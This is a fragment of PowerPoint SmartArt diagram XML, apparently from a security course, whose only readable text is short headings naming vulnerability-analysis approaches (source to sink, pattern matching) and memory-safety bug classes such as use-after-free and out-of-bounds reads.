    <dgm:cxn modelId="{F7703E60-7AC8-A54E-BDB1-133F51C39E4F}" type="presParOf" srcId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C}"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8B1A96-22E4-485B-96F0-691B898CEAAD}"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39FC8A06-35B2-4195-BED0-13EA5156D668}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Source to Sink</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4539C87D-B19A-4CF8-BE59-685042FC329E}" type="parTrans" cxnId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DD315CE-0298-4256-AE38-E69AA389B38A}" type="sibTrans" cxnId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Sink to Source</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{812E1A04-BF4C-4B4B-AB46-CAE5FF53CDC2}" type="parTrans" cxnId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E414558F-19DC-4B4A-94D0-8F569A0DB277}" type="sibTrans" cxnId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pattern Matching</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9257CC8C-AAB1-42EB-A8AE-2FE21674B5E1}" type="parTrans" cxnId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADD675E2-4566-43C9-8000-7BC65007ECD4}" type="sibTrans" cxnId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" type="pres">
      <dgm:prSet presAssocID="{938B1A96-22E4-485B-96F0-691B898CEAAD}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" type="pres">
      <dgm:prSet presAssocID="{39FC8A06-35B2-4195-BED0-13EA5156D668}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C84FB5BE-0A7B-1943-A2C9-8C440C89BCDA}" type="pres">
      <dgm:prSet presAssocID="{7DD315CE-0298-4256-AE38-E69AA389B38A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" type="pres">
      <dgm:prSet presAssocID="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4239C3D-C4C0-E145-8777-AFF56BBA2B5D}" type="pres">
      <dgm:prSet presAssocID="{E414558F-19DC-4B4A-94D0-8F569A0DB277}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}" type="pres">
      <dgm:prSet presAssocID="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{39FC8A06-35B2-4195-BED0-13EA5156D668}" srcOrd="0" destOrd="0" parTransId="{4539C87D-B19A-4CF8-BE59-685042FC329E}" sibTransId="{7DD315CE-0298-4256-AE38-E69AA389B38A}"/>
    <dgm:cxn modelId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" srcOrd="2" destOrd="0" parTransId="{9257CC8C-AAB1-42EB-A8AE-2FE21674B5E1}" sibTransId="{ADD675E2-4566-43C9-8000-7BC65007ECD4}"/>
    <dgm:cxn modelId="{34DF9235-C645-AF4D-ADAA-224469FEC08A}" type="presOf" srcId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" destId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{270D4B57-CF47-1840-A551-AA17AC15F6C3}" type="presOf" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2C083A6B-449A-034E-BB07-362F3C7F846D}" type="presOf" srcId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" destId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{87F1AD7A-E48E-8B45-B721-E177A63DEC3C}" type="presOf" srcId="{39FC8A06-35B2-4195-BED0-13EA5156D668}" destId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" srcOrd="1" destOrd="0" parTransId="{812E1A04-BF4C-4B4B-AB46-CAE5FF53CDC2}" sibTransId="{E414558F-19DC-4B4A-94D0-8F569A0DB277}"/>
    <dgm:cxn modelId="{278CD5D6-F6A1-CA48-AD12-509100B96361}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F695C5C9-EA83-3347-947E-C3449AC4F19E}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{C84FB5BE-0A7B-1943-A2C9-8C440C89BCDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{868E4221-F0F9-B44C-BD48-DCDCEF286BCE}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D1F33643-7BB3-C948-9732-C55CF0EB2E89}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{A4239C3D-C4C0-E145-8777-AFF56BBA2B5D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{0D39BB21-E6FD-0749-A1F3-A90AE50FA9D6}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}"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F6A9B7-0821-4D4C-A774-57913E395A06}"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E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Uninitialized Memory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0801B4E-8E79-447B-B15F-E57116B638C1}" type="parTrans" cxnId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}" type="sibTrans" cxnId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86804358-EDC3-43FB-88BB-D37047916BA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use after free read</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A450CC1F-514C-4805-B489-45B5329F1F7C}" type="parTrans" cxnId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}" type="sibTrans" cxnId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Out of bounds read</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F2B32DA-4F33-4C84-AF5B-99FF291C98BE}" type="parTrans" cxnId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5653F958-935C-4D49-9258-4550E40E0EC9}" type="sibTrans" cxnId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Others (not talked about in course) i.e. format strings</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CDB9A49-0676-1D47-9A4E-502B5E2F229B}" type="parTrans" cxnId="{4C77C8EF-64AB-B442-8727-57D5BA990334}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{638BEF39-AAD8-DC4D-9902-B42210E35AC1}" type="sibTrans" cxnId="{4C77C8EF-64AB-B442-8727-57D5BA990334}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" type="pres">
      <dgm:prSet presAssocID="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55698BB2-8180-D14C-BF77-492AD5D66461}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4F4FF91-5414-5D44-8797-C579B022DE73}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55BF737C-AC97-8945-87D8-8689C951FB7E}" type="pres">
      <dgm:prSet presAssocID="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94912B45-798C-0F43-A383-09A3E298E6C0}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5065B2F-00BD-BF4B-9A28-D22B4389B51F}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCC18504-3C26-6646-AD73-F3DB3E3E63C0}" type="pres">
      <dgm:prSet presAssocID="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF93BF18-2193-C44A-A20B-65338489AC29}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{598A9B79-BB95-8647-BA99-BB22EB2B440D}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2B2B855D-1F8C-4E4B-BC6C-39DE7FBBE637}" type="pres">
      <dgm:prSet presAssocID="{5653F958-935C-4D49-9258-4550E40E0EC9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD4B9195-C049-1542-BA91-309152EF96A7}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E6396B2-B749-A146-97EF-77F9C856450F}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E132D0F2-93C3-9E43-BF2E-2BBCBD22740C}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{120E51CA-335C-E044-B1D4-4611BAE02C76}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B56AC220-9023-5543-BB54-8390414F9578}" type="presOf" srcId="{86804358-EDC3-43FB-88BB-D37047916BA9}" destId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4A091E4B-7CA1-0E4C-8A1B-AF49AE620D75}" type="presOf" srcId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" destId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DB142358-D5E0-3D43-B8F8-7ED12D905FD8}" type="presOf" srcId="{86804358-EDC3-43FB-88BB-D37047916BA9}" destId="{94912B45-798C-0F43-A383-09A3E298E6C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CB720E6A-996E-E545-9A17-CCD5F5D30955}" type="presOf" srcId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" destId="{FD4B9195-C049-1542-BA91-309152EF96A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DCFBE489-07C8-9547-990D-D562589CF7FC}" type="presOf" srcId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" destId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{86804358-EDC3-43FB-88BB-D37047916BA9}" srcOrd="1" destOrd="0" parTransId="{A450CC1F-514C-4805-B489-45B5329F1F7C}" sibTransId="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}"/>
    <dgm:cxn modelId="{4B1954B8-2F04-DB4C-95E2-7A410327BBF7}" type="presOf" srcId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" destId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{84A883BB-9964-2D4E-907D-23EDDFE283D6}" type="presOf" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" srcOrd="0" destOrd="0" parTransId="{F0801B4E-8E79-447B-B15F-E57116B638C1}" sibTransId="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}"/>
    <dgm:cxn modelId="{38798AE0-B358-4347-8347-41922B692642}" type="presOf" srcId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" destId="{DF93BF18-2193-C44A-A20B-65338489AC29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C5421FEA-463E-B94A-9AC1-7F1AB48A757C}" type="presOf" srcId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" destId="{6E6396B2-B749-A146-97EF-77F9C856450F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" srcOrd="2" destOrd="0" parTransId="{9F2B32DA-4F33-4C84-AF5B-99FF291C98BE}" sibTransId="{5653F958-935C-4D49-9258-4550E40E0EC9}"/>
    <dgm:cxn modelId="{4C77C8EF-64AB-B442-8727-57D5BA990334}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" srcOrd="3" destOrd="0" parTransId="{7CDB9A49-0676-1D47-9A4E-502B5E2F229B}" sibTransId="{638BEF39-AAD8-DC4D-9902-B42210E35AC1}"/>
    <dgm:cxn modelId="{8BE998FE-43B0-7D4C-B0FF-14A81CEDBFD5}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7933543E-9F37-C84B-9F05-A2960ACB840D}" type="presParOf" srcId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" destId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{967A1DD0-38BD-A84B-AFFE-A1D0B232FAC3}" type="presParOf" srcId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" destId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3A247939-6A04-D74C-B4FB-755E5A16EF6E}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{55698BB2-8180-D14C-BF77-492AD5D66461}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{88488B5B-90DD-BF4A-A40A-A7CE5E818F23}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{C4F4FF91-5414-5D44-8797-C579B022DE73}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8705D888-73C6-4341-91C7-6B5805A01B3B}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{55BF737C-AC97-8945-87D8-8689C951FB7E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BEFE9410-1D72-1C4E-B217-F45BEE61B052}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
